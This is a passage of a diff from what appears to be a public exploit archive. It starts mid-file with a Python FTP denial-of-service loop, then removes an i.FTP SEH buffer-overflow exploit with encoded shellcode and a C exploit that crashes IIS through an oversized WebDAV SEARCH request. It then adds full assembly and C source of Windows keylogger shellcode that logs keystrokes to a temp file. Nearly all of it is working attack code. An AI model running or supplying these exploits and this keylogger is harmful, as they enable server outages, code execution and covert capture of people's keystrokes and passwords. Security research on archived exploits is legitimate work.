+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+open = sock.connect_ex((host,port))
+sock.close()
+
+if (open == 0):
+    print "FTP is up, lets fix that..."
+    while (open != 10061):
+        print "Connecting to send evil TYPE command..."
+        ftp = FTP()
+        ftp.connect(host,port)
+        ftp.login(u,p)
+        ftp.sendcmd(evilTYPE)
+        ftp.close()
+        time.sleep(pause)
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        open = sock.connect_ex((host,port))
+        sock.close()
+    print "No more files for you!"
+else:
+    print "Port "+str(port)+" does not seem to be open on "+host
--- a/platforms/windows/local/39782.py
+++ b/platforms/windows/local/39782.py
@ -1,70 +0,0 @@
-#!/usr/bin/python
-
-# Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit
-# Date: 3-5-2016
-# Exploit Author: Tantaryu MING
-# Vendor Homepage: http://www.memecode.com/iftp.php
-# Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
-# Version: 2.21
-# Tested on: Windows 7 SP1 x86_64
-
-
-# How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button
-
-'''
-msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b '\x00\x0d\x20\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferREgister=EAX
-'''
-shellcode = (
-"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
-"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
-"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
-"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
-"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x43\x30\x33\x50\x4d\x59"
-"\x4a\x45\x36\x51\x39\x50\x42\x44\x4c\x4b\x30\x50\x56\x50\x4c"
-"\x4b\x51\x42\x34\x4c\x4c\x4b\x30\x52\x35\x44\x4c\x4b\x42\x52"
-"\x31\x38\x44\x4f\x58\x37\x51\x5a\x57\x56\x30\x31\x4b\x4f\x4e"
-"\x4c\x47\x4c\x35\x31\x43\x4c\x53\x32\x56\x4c\x51\x30\x59\x51"
-"\x58\x4f\x34\x4d\x53\x31\x49\x57\x4b\x52\x4a\x52\x50\x52\x50"
-"\x57\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x50\x4a\x37\x4c\x4c\x4b"
-"\x30\x4c\x54\x51\x52\x58\x4b\x53\x50\x48\x35\x51\x38\x51\x50"
-"\x51\x4c\x4b\x31\x49\x47\x50\x33\x31\x48\x53\x4c\x4b\x51\x59"
-"\x32\x38\x4d\x33\x47\x4a\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x35"
-"\x51\x59\x46\x56\x51\x4b\x4f\x4e\x4c\x59\x51\x48\x4f\x54\x4d"
-"\x45\x51\x58\x47\x57\x48\x4d\x30\x33\x45\x4a\x56\x55\x53\x53"
-"\x4d\x4c\x38\x57\x4b\x33\x4d\x47\x54\x52\x55\x4b\x54\x30\x58"
-"\x4c\x4b\x31\x48\x36\x44\x43\x31\x59\x43\x43\x56\x4c\x4b\x44"
-"\x4c\x50\x4b\x4c\x4b\x46\x38\x35\x4c\x45\x51\x4e\x33\x4c\x4b"
-"\x34\x44\x4c\x4b\x45\x51\x58\x50\x4b\x39\x51\x54\x36\x44\x57"
-"\x54\x51\x4b\x31\x4b\x33\x51\x36\x39\x51\x4a\x30\x51\x4b\x4f"
-"\x4b\x50\x51\x4f\x31\x4f\x30\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
-"\x4d\x51\x4d\x33\x5a\x55\x51\x4c\x4d\x4d\x55\x58\x32\x35\x50"
-"\x45\x50\x45\x50\x56\x30\x33\x58\x30\x31\x4c\x4b\x42\x4f\x4d"
-"\x57\x4b\x4f\x38\x55\x4f\x4b\x4a\x50\x4e\x55\x39\x32\x50\x56"
-"\x52\x48\x59\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x37"
-"\x4c\x35\x56\x33\x4c\x44\x4a\x4d\x50\x4b\x4b\x4b\x50\x42\x55"
-"\x33\x35\x4f\x4b\x37\x37\x55\x43\x53\x42\x52\x4f\x53\x5a\x33"
-"\x30\x46\x33\x4b\x4f\x39\x45\x53\x53\x45\x31\x52\x4c\x35\x33"
-"\x35\x50\x41\x41"
-)
-
-eax_zeroed = '\x25\x2E\x2E\x2E\x2E'
-eax_zeroed += '\x25\x11\x11\x11\x11'
-
-align_to_eax = "\x54\x58" # Get ESP and pop it into EAX
-align_to_eax += "\x2d\x7d\x7d\x7d\x7d" # SUB EAX, 0x7d7d7d7d
-align_to_eax += "\x2d\x01\x01\x01\x01" # SUB EAX, 0x01010101
-align_to_eax += "\x2d\x01\x01\x02\x02" # SUB EAX, 0x02020101
-align_to_eax += "\x2d\x7c\x73\x7f\x7f" # SUB EAX, 0x7f7f737c
-
-buffer = "\x41" * 1865
-buffer += "\x42\x42\x71\x04" # Pointer to Next SEH Record
-buffer += "\x78\x2a\x01\x10" # SEH HANDLER
-buffer += eax_zeroed
-buffer += align_to_eax
-buffer += "\x43" * 5
-buffer += shellcode
-buffer += "E" * 4
-  
-f = open('exploit.txt', "wb")
-f.write(buffer)
-f.close()
--- a/platforms/windows/remote/22670.c
+++ b/platforms/windows/remote/22670.c
@ -1,172 +0,0 @@
-source: http://www.securityfocus.com/bid/7735/info
-
-Microsoft Internet Information Services has been reported vulnerable to a denial of service.
-
-When WebDAV receives excessively long requests to the 'PROPFIND' or 'SEARCH' variables, the IIS service will fail. All current web, FTP, and email sessions will be terminated.
-
-IIS will automatically restart and normal service will resume.
-
-** It has been reported that if a WebDAV request with a certain number of bytes is received, the Inetinfo service will remain alive but cease serving requests. This will cause the IIS server to stop serving requests until the service is manually restarted.
-
-/*
-IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+
-Bid:  7735
-*/
-
-#define ERROR -1
-#define OK 1
-
-#ifdef HAVE_CONFIG_H
-#include <config.h>
-#endif
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <sys/socket.h>
-#include <sys/types.h>
-#include <netinet/in.h>
-#include <arpa/inet.h>
-#include <string.h>
-
-int check_for_iis();
-void screw_iis();
-void usage();
-
-char IP[15];
-
-int main(int argc, char *argv[])
-{
-/*  cout << "Hello, World!" << endl;  */
-
-   if(argc !=2)
-   {
-      usage();  exit(0);
-   }
-
-   printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
-
-   strcpy(IP, argv[1]);
-
-   if(check_for_iis() != OK)
-   {
-      printf("Sorry, BAD LUCK! \n");    exit(0);
-   }
-
-   screw_iis();
-
-  return EXIT_SUCCESS;
-}
-
-int check_for_iis()
-{
-  int sck, flag = 1;
-  struct sockaddr_in sin;
-  char req[50];
-
-  sck = socket(AF_INET, SOCK_STREAM, 0);
-  if(sck == ERROR)
-  {
-    perror("Socket error ");      exit(0);
-  }
-
-  sin.sin_port = htons(80);
-  sin.sin_family = AF_INET;
-  sin.sin_addr.s_addr = inet_addr(IP);
-
-  if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
-  {
-    perror("Connect Error ");     exit(0);
-  }
-
-  strcpy(req, "GET / HTTP/1.0\r\n\n");
-  send(sck, req, sizeof(req), 0);
-  recv(sck, req, sizeof(req), 0);
-
-  if (strstr(req,"IIS") == NULL)
-  {
-    printf(" Not an IIS server! \n");
-    flag = 0;
-  }
-
-  sprintf(req,"SEARCH / HTTP/1.0\r\n\n",40);
-  send(sck, req, sizeof(req), 0);
-  recv(sck, req, sizeof(req), 0);
-
-  if (strstr(req,"HTTP/1.1 411 Length Required") == NULL)
-  {
-    printf("METHOD SEARCH NOT ALLOWED. \n");
-    flag = 0;
-  }
-
-  return(flag);
-}
-
-
-
-void screw_iis()
-{
-  int sck, flag = 1;
-  struct sockaddr_in sin;
-  char junk[100];
-  char buffer[65535] ="";
-  char request[80000];
-  char content[] =
-           "<?xml version=\"1.0\"?>\r\n"
-           "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
-           "<g:sql>\r\n"
-           "Select \"DAV:displayname\" from scope()\r\n"
-           "</g:sql>\r\n"
-           "</g:searchrequest>\r\n";
-
-
-  sck = socket(AF_INET, SOCK_STREAM, 0);
-  if(sck == ERROR)
-  {
-    perror("Socket error ");      exit(0);
-  }
-
-  sin.sin_port = htons(80);
-  sin.sin_family = AF_INET;
-  sin.sin_addr.s_addr = inet_addr(IP);
-
-  if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
-  {
-    perror("Connect Error ");     exit(0);
-  }
-
-  buffer[sizeof(buffer)]=0x00;
-
-  memset(buffer,'S',sizeof(buffer));
-  memset(request,0,sizeof(request));
-  memset(junk,0,sizeof(junk));
-
-  sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nCon
-tent-Length: ",buffer,IP);
-  sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
-
-  printf("\r\nScrewing the server... \n");
-
-  send(sck,request,strlen(request),0);
-
-  send(sck,content,strlen(content),0);
-
-  recv(sck,junk,sizeof(junk),0);
-
-  if(junk[0]==0x00)
-  {
-     printf("Server is Screwed! \r\n");
-  }
-  else
-  {
-      printf("BAD LUCK. Patched.\n");
-  }
-}
-
-
-
-void usage()
-{
-  printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
-  printf("Usage\r\n");
-  printf("Screw_IIS <victim IP>\n");
-}
--- a/platforms/windows/shellcode/39794.c
+++ b/platforms/windows/shellcode/39794.c
@ -0,0 +1,366 @@
+/*
+; Exploit Title: All windows null free shellcode - functional keylogger to file - 601 (0x0259) bytes
+; Date: Sat May  7 19:32:08 GMT 2016
+; Exploit Author: Fugu
+; Vendor Homepage: www.microsoft.com
+; Version: all afaik
+; Tested on: Win7 (im guessing it will work on others)
+; Note: it will write to "log.bin" in the users %TEMP% directory.
+;       keystrokes are saved in format: "Virtual-Key Codes", from 
+;       msdn.microsoft.com website
+; nasm -f win32 test.asm && i686-w64-mingw32-ld -o test.exe test.obj
+; |STACK| (at the main loop)
+; 00000000 Location of bool array
+; 00000000 |
+; 00000000 |
+; 00000000 |
+; 00000000 |
+; 00000000 |
+; 00000000 |
+; 00000000 V_
+; (FILE HANDLE)
+; KERNEL32.lstrcatA
+; KERNEL32.Sleep
+; KERNEL32.GetEnvironmentVariableA
+; KERNEL32.CreateFileA
+; KERNEL32.WriteFileA
+; user32.GetKeyState
+; user32.7EC00000
+; KERNEL32.LoadLibraryA
+; KERNEL32.GetModuleHandleA
+; KERNEL32.GetProcAddress
+; KERNEL32.7B410000
+section .bss
+
+section .data
+
+section .text
+   global _start
+      _start:
+    cld  								; 00000000 FC
+    xor edx,edx  							; 00000001 31D2
+    mov dl,0x30  							; 00000003 B230
+    push dword [fs:edx]  						; 00000005 64FF32
+    pop edx  								; 00000008 5A
+    mov edx,[edx+0xc]  							; 00000009 8B520C
+    mov edx,[edx+0x14]  						; 0000000C 8B5214
+loc_fh:
+    mov esi,[edx+0x28]  						; 0000000F 8B7228
+    xor eax,eax  							; 00000012 31C0
+    mov ecx,eax  							; 00000014 89C1
+    mov cl,0x3  							; 00000016 B103
+loc_18h:
+    lodsb  								; 00000018 AC
+    rol eax,byte 0x8  							; 00000019 C1C008
+    lodsb  								; 0000001C AC
+    loop loc_18h  							; 0000001D E2F9
+    lodsb  								; 0000001F AC
+    cmp eax,0x4b45524e  						; 00000020 3D4E52454B
+    jz loc_2ch  							; 00000025 7405
+    cmp eax,0x6b65726e  						; 00000027 3D6E72656B
+loc_2ch:
+    mov ebx,[edx+0x10]  						; 0000002C 8B5A10
+    mov edx,[edx]  							; 0000002F 8B12
+    jnz loc_fh  							; 00000031 75DC
+    mov edx,[ebx+0x3c]  						; 00000033 8B533C
+    add edx,ebx  							; 00000036 01DA
+    push dword [edx+0x34]  						; 00000038 FF7234
+    mov edx,[edx+0x78]  						; 0000003B 8B5278
+    add edx,ebx  							; 0000003E 01DA
+    mov esi,[edx+0x20]  						; 00000040 8B7220
+    add esi,ebx  							; 00000043 01DE
+
+;GetProcAddress
+    xor ecx,ecx  							; 00000045 31C9
+loc_47h:
+    inc ecx  								; 00000047 41
+    lodsd  								; 00000048 AD
+    add eax,ebx  							; 00000049 01D8
+    cmp dword [eax],0x50746547  					; 0000004B 813847657450
+    jnz loc_47h  							; 00000051 75F4
+    cmp dword [eax+0x4],0x41636f72  					; 00000053 817804726F6341
+    jnz loc_47h  							; 0000005A 75EB
+    cmp dword [eax+0x8],0x65726464  					; 0000005C 81780864647265
+    jnz loc_47h  							; 00000063 75E2
+    dec ecx  								; 00000065 49
+    mov esi,[edx+0x24]  						; 00000066 8B7224
+    add esi,ebx  							; 00000069 01DE
+    mov cx,[esi+ecx*2]  						; 0000006B 668B0C4E
+    mov esi,[edx+0x1c]  						; 0000006F 8B721C
+    add esi,ebx  							; 00000072 01DE
+    mov edx,[esi+ecx*4]  						; 00000074 8B148E
+    add edx,ebx  							; 00000077 01DA
+    mov edi,edx  							; 00000079 89D7
+    push edx  								; 0000007B 52
+
+;GetModuleHandleA
+    xor eax,eax  							; 0000007C 31C0
+    push eax  								; 0000007E 50
+    push dword 0x41656c64  						; 0000007F 68646C6541
+    push dword 0x6e614865  						; 00000084 686548616E
+    push dword 0x6c75646f  						; 00000089 686F64756C
+    push dword 0x4d746547  						; 0000008E 684765744D
+    push esp  								; 00000093 54
+    push ebx  								; 00000094 53
+    call edi  								; 00000095 FFD7
+    lea esp,[esp+0x14]  						; 00000097 8D642414
+    push eax  								; 0000009B 50
+
+;GetModuleHandleA("USER32.DLL")
+    push dword 0x88014c4c  						; 0000009C 684C4C0188
+    dec byte [esp+0x2]  						; 000000A1 FE4C2402
+    push dword 0x442e3233  						; 000000A5 6833322E44
+    push dword 0x52455355  						; 000000AA 6855534552
+    push esp  								; 000000AF 54
+    call eax  								; 000000B0 FFD0
+    xor edx,edx  							; 000000B2 31D2
+    cmp eax,edx  							; 000000B4 39D0
+    jnz loc_f0h  							; 000000B6 7538
+    lea esp,[esp+0xc]  							; 000000B8 8D64240C
+
+;LoadLibraryA
+    push edx  								; 000000BC 52
+    push dword 0x41797261  						; 000000BD 6861727941
+    push dword 0x7262694c  						; 000000C2 684C696272
+    push dword 0x64616f4c  						; 000000C7 684C6F6164
+    push esp  								; 000000CC 54
+    push ebx  								; 000000CD 53
+    call edi  								; 000000CE FFD7
+    lea esp,[esp+0x10]  						; 000000D0 8D642410
+    push eax  								; 000000D4 50
+
+;LoadLibraryA("USER32.DLL")
+    push dword 0x77014c4c  						; 000000D5 684C4C0177
+    dec byte [esp+0x2]  						; 000000DA FE4C2402
+    push dword 0x442e3233  						; 000000DE 6833322E44
+    push dword 0x52455355  						; 000000E3 6855534552
+    push esp  								; 000000E8 54
+    call eax  								; 000000E9 FFD0
+    lea esp,[esp+0xc]  							; 000000EB 8D64240C
+    push eax  								; 000000EF 50
+
+;GetKeyState
+loc_f0h:
+    mov edx,eax  							; 000000F0 89C2
+    push dword 0x1657461  						; 000000F2 6861746501
+    dec byte [esp+0x3]  						; 000000F7 FE4C2403
+    push dword 0x74537965  						; 000000FB 6865795374
+    push dword 0x4b746547  						; 00000100 684765744B
+    push esp  								; 00000105 54
+    push edx  								; 00000106 52
+    call edi  								; 00000107 FFD7
+    lea esp,[esp+0xc]  							; 00000109 8D64240C
+    push eax  								; 0000010D 50
+
+;WriteFile
+    push dword 0x55010165  						; 0000010E 6865010155
+    dec byte [esp+0x1]  						; 00000113 FE4C2401
+    push dword 0x6c694665  						; 00000117 686546696C
+    push dword 0x74697257  						; 0000011C 6857726974
+    push esp  								; 00000121 54
+    push ebx  								; 00000122 53
+    call edi  								; 00000123 FFD7
+    lea esp,[esp+0xc]  							; 00000125 8D64240C
+    push eax  								; 00000129 50
+
+;CreateFileA
+    push dword 0x141656c  						; 0000012A 686C654101
+    dec byte [esp+0x3]  						; 0000012F FE4C2403
+    push dword 0x69466574  						; 00000133 6874654669
+    push dword 0x61657243  						; 00000138 6843726561
+    push esp  								; 0000013D 54
+    push ebx  								; 0000013E 53
+    call edi  								; 0000013F FFD7
+    lea esp,[esp+0xc]  							; 00000141 8D64240C
+    push eax  								; 00000145 50
+
+;GetEnvironmentVariableA
+    push dword 0x141656c  						; 00000146 686C654101
+    dec byte [esp+0x3]  						; 0000014B FE4C2403
+    push dword 0x62616972  						; 0000014F 6872696162
+    push dword 0x6156746e  						; 00000154 686E745661
+    push dword 0x656d6e6f  						; 00000159 686F6E6D65
+    push dword 0x7269766e  						; 0000015E 686E766972
+    push dword 0x45746547  						; 00000163 6847657445
+    push esp  								; 00000168 54
+    push ebx  								; 00000169 53
+    call edi  								; 0000016A FFD7
+    lea esp,[esp+0x18]  						; 0000016C 8D642418
+    push eax  								; 00000170 50
+
+;Sleep
+    push byte +0x70  							; 00000171 6A70
+    push dword 0x65656c53  						; 00000173 68536C6565
+    push esp  								; 00000178 54
+    push ebx  								; 00000179 53
+    call edi  								; 0000017A FFD7
+    lea esp,[esp+0x8]  							; 0000017C 8D642408
+    push eax  								; 00000180 50
+
+;lstrcatA
+    push edx  								; 00000181 52
+    push dword 0x41746163  						; 00000182 6863617441
+    push dword 0x7274736c  						; 00000187 686C737472
+    push esp  								; 0000018C 54
+    push ebx  								; 0000018D 53
+    call edi  								; 0000018E FFD7
+    lea esp,[esp+0xc]  							; 00000190 8D64240C
+    push eax  								; 00000194 50
+
+;GetEnvironmentVariableA("TEMP");
+    xor ecx,ecx  							; 00000195 31C9
+    mov cl,0xe  							; 00000197 B10E
+loc_199h:
+    push ecx  								; 00000199 51
+    loop loc_199h  							; 0000019A E2FD
+    push ecx  								; 0000019C 51
+    push dword 0x504d4554  						; 0000019D 6854454D50
+    mov ecx,esp  							; 000001A2 89E1
+    push byte +0x40  							; 000001A4 6A40
+    push ecx  								; 000001A6 51
+    push ecx  								; 000001A7 51
+    call dword [esp+0x54]  						; 000001A8 FF542454
+    mov edx,esp  							; 000001AC 89E2
+
+;"\log.bin"
+    push byte +0x1  							; 000001AE 6A01
+    dec byte [esp]  							; 000001B0 FE0C24
+    push dword 0x6e69622e  						; 000001B3 682E62696E
+    push dword 0x676f6c5c  						; 000001B8 685C6C6F67
+    mov ecx,esp  							; 000001BD 89E1
+    push ecx  								; 000001BF 51
+    push edx  								; 000001C0 52
+    call dword [esp+0x54]  						; 000001C1 FF542454
+
+;CreateFileA("%TEMP%\log.bin")
+    xor ecx,ecx  							; 000001C5 31C9
+    push ecx  								; 000001C7 51
+    push ecx  								; 000001C8 51
+    add byte [esp],0x80  						; 000001C9 80042480
+    push byte +0x4  							; 000001CD 6A04
+    push ecx  								; 000001CF 51
+    push byte +0x2  							; 000001D0 6A02
+    push ecx  								; 000001D2 51
+    add byte [esp],0x4  						; 000001D3 80042404
+    push eax  								; 000001D7 50
+    call dword [esp+0x74]  						; 000001D8 FF542474
+    lea esp,[esp+0x4c]  						; 000001DC 8D64244C
+    push eax  								; 000001E0 50
+    xor ecx,ecx  							; 000001E1 31C9
+    mov esi,ecx  							; 000001E3 89CE
+    mov cl,0x8  							; 000001E5 B108
+loc_1e7h:
+    push esi  								; 000001E7 56
+    loop loc_1e7h  							; 000001E8 E2FD
+
+;main loop
+loc_1eah:
+    xor ecx,ecx  							; 000001EA 31C9
+    xor esi,esi  							; 000001EC 31F6
+    push byte +0x8  							; 000001EE 6A08
+    call dword [esp+0x2c]  						; 000001F0 FF54242C
+loc_1f4h:
+    mov eax,esi  							; 000001F4 89F0
+    cmp al,0xff  							; 000001F6 3CFF
+    jnc loc_1eah  							; 000001F8 73F0
+    inc esi  								; 000001FA 46
+    push esi  								; 000001FB 56
+    call dword [esp+0x3c]  						; 000001FC FF54243C
+    mov edx,esi  							; 00000200 89F2
+    xor ecx,ecx  							; 00000202 31C9
+    mov cl,0x80  							; 00000204 B180
+    and eax,ecx  							; 00000206 21C8
+    xor ecx,ecx  							; 00000208 31C9
+    cmp eax,ecx  							; 0000020A 39C8
+    jnz loc_21eh  							; 0000020C 7510
+
+;GetKeyState false
+;set bool array index zero
+    xor edx,edx  							; 0000020E 31D2
+    mov ecx,edx  							; 00000210 89D1
+    mov eax,esi  							; 00000212 89F0
+    mov cl,0x20  							; 00000214 B120
+    div ecx  								; 00000216 F7F1
+    btr [esp+eax*4],edx  						; 00000218 0FB31484
+    jmp short loc_1f4h  						; 0000021C EBD6
+
+;GetKeyState true
+;check bool array
+;if bool true, skip
+;if bool false, set bool true, write to file
+loc_21eh:
+    xor edx,edx  							; 0000021E 31D2
+    mov ecx,edx  							; 00000220 89D1
+    mov eax,esi  							; 00000222 89F0
+    mov cl,0x20  							; 00000224 B120
+    div ecx  								; 00000226 F7F1
+    bt [esp+eax*4],edx  						; 00000228 0FA31484
+    jc loc_1f4h  							; 0000022C 72C6
+
+    xor edx,edx  							; 0000022E 31D2
+    mov ecx,edx  							; 00000230 89D1
+    mov eax,esi  							; 00000232 89F0
+    mov cl,0x20  							; 00000234 B120
+    div ecx  								; 00000236 F7F1
+    bts [esp+eax*4],edx  						; 00000238 0FAB1484
+
+    xor ecx,ecx  							; 0000023C 31C9
+    push esi  								; 0000023E 56
+    push ecx  								; 0000023F 51
+    lea ecx,[esp]  							; 00000240 8D0C24
+    push ecx  								; 00000243 51
+    push byte +0x1  							; 00000244 6A01
+    lea ecx,[esp+0xc]  							; 00000246 8D4C240C
+    push ecx  								; 0000024A 51
+    push dword [esp+0x34]  						; 0000024B FF742434
+    call dword [esp+0x4c]  						; 0000024F FF54244C
+    lea esp,[esp+0x4]  							; 00000253 8D642404
+    jmp short loc_1eah  						; 00000257 EB91
+*/
+#include <stdio.h>
+#include <string.h>
+
+unsigned char sc[] = "\xfc\x31\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
+		"\x72\x28\x31\xc0\x89\xc1\xb1\x03\xac\xc1\xc0\x08\xac\xe2\xf9\xac"
+		"\x3d\x4e\x52\x45\x4b\x74\x05\x3d\x6e\x72\x65\x6b\x8b\x5a\x10\x8b"
+		"\x12\x75\xdc\x8b\x53\x3c\x01\xda\xff\x72\x34\x8b\x52\x78\x01\xda"
+		"\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74"
+		"\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64"
+		"\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x8b"
+		"\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd7\x52\x31\xc0\x50\x68"
+		"\x64\x6c\x65\x41\x68\x65\x48\x61\x6e\x68\x6f\x64\x75\x6c\x68\x47"
+		"\x65\x74\x4d\x54\x53\xff\xd7\x8d\x64\x24\x14\x50\x68\x4c\x4c\x01"
+		"\x88\xfe\x4c\x24\x02\x68\x33\x32\x2e\x44\x68\x55\x53\x45\x52\x54"
+		"\xff\xd0\x31\xd2\x39\xd0\x75\x38\x8d\x64\x24\x0c\x52\x68\x61\x72"
+		"\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd7"
+		"\x8d\x64\x24\x10\x50\x68\x4c\x4c\x01\x77\xfe\x4c\x24\x02\x68\x33"
+		"\x32\x2e\x44\x68\x55\x53\x45\x52\x54\xff\xd0\x8d\x64\x24\x0c\x50"
+		"\x89\xc2\x68\x61\x74\x65\x01\xfe\x4c\x24\x03\x68\x65\x79\x53\x74"
+		"\x68\x47\x65\x74\x4b\x54\x52\xff\xd7\x8d\x64\x24\x0c\x50\x68\x65"
+		"\x01\x01\x55\xfe\x4c\x24\x01\x68\x65\x46\x69\x6c\x68\x57\x72\x69"
+		"\x74\x54\x53\xff\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe"
+		"\x4c\x24\x03\x68\x74\x65\x46\x69\x68\x43\x72\x65\x61\x54\x53\xff"
+		"\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe\x4c\x24\x03\x68"
+		"\x72\x69\x61\x62\x68\x6e\x74\x56\x61\x68\x6f\x6e\x6d\x65\x68\x6e"
+		"\x76\x69\x72\x68\x47\x65\x74\x45\x54\x53\xff\xd7\x8d\x64\x24\x18"
+		"\x50\x6a\x70\x68\x53\x6c\x65\x65\x54\x53\xff\xd7\x8d\x64\x24\x08"
+		"\x50\x52\x68\x63\x61\x74\x41\x68\x6c\x73\x74\x72\x54\x53\xff\xd7"
+		"\x8d\x64\x24\x0c\x50\x31\xc9\xb1\x0e\x51\xe2\xfd\x51\x68\x54\x45"
+		"\x4d\x50\x89\xe1\x6a\x40\x51\x51\xff\x54\x24\x54\x89\xe2\x6a\x01"
+		"\xfe\x0c\x24\x68\x2e\x62\x69\x6e\x68\x5c\x6c\x6f\x67\x89\xe1\x51"
+		"\x52\xff\x54\x24\x54\x31\xc9\x51\x51\x80\x04\x24\x80\x6a\x04\x51"
+		"\x6a\x02\x51\x80\x04\x24\x04\x50\xff\x54\x24\x74\x8d\x64\x24\x4c"
+		"\x50\x31\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08"
+		"\xff\x54\x24\x2c\x89\xf0\x3c\xff\x73\xf0\x46\x56\xff\x54\x24\x3c"
+		"\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31\xd2"
+		"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31\xd2"
+		"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31\xd2"
+		"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x31\xc9\x56\x51"
+		"\x8d\x0c\x24\x51\x6a\x01\x8d\x4c\x24\x0c\x51\xff\x74\x24\x34\xff"
+		"\x54\x24\x4c\x8d\x64\x24\x04\xeb\x91";
+
+int main(int argc, char *argv[]){
+	printf("Shellcode length: %d\n", (int)strlen(sc));
+	(*(void(*)(void))&sc)();
+	return 0;
+}